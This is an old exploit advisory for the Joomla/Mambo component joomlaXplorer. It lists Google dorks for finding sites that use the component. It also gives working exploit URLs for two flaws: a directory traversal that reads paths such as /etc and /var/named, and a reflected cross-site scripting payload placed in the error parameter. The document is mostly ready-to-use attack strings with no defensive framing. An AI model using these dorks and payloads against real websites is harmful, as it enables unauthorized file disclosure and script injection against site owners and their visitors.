Joomla Component joomlaXplorer <= 1.6.2 Remote Vulnerabilities

2008-04-11
ID: 2868
CVE: None
Download vulnerable application: None
-------------------------------------------------------------
----- H-T Team [ HouSSaMix + ToXiC350 ] from MoroCCo --------
-------------------------------------------------------------

= Author : HouSSaMix                          
= Script : Joomla and Mambo Component joomlaxplorer  
= version : 1.6.0
= Download : http://joomlacode.org/gf/project/joomlaxplorer

= Dork1 : inurl:index.php?option=com_joomlaxplorer
= Dork2 : powered by joomlaXplorer
          			           
							   
= BUG 1 :  Local Directory Traversal 

exploit => target.com/path/index.php?option=com_joomlaxplorer&action=show_error&dir=../../[directory]

example :
  site.com/joomla/index.php?option=com_joomlaxplorer&action=show_error&dir=..%2F..%2F..%2F%2F..%2F..%2Fetc
  site.com/joomla/index.php?option=com_joomlaxplorer&action=show_error&dir=..%2F..%2F..%2F%2F..%2F..%2F%2Fvar%2Fnamed

= BUG 2 : XSS

exploit => target.com/path/index.php?option=com_joomlaxplorer&action=show_error&dir=hsmx&order=name&srt=yes&error=[XSS]
 
example : www.target.com/path/index.php?option=com_joomlaxplorer&action=show_error&dir=hsmx&order=name&srt=yes&error=%22%3E%3Cscript%3Ealert(1);%3C/script%3E
   

1-4-2 (www01)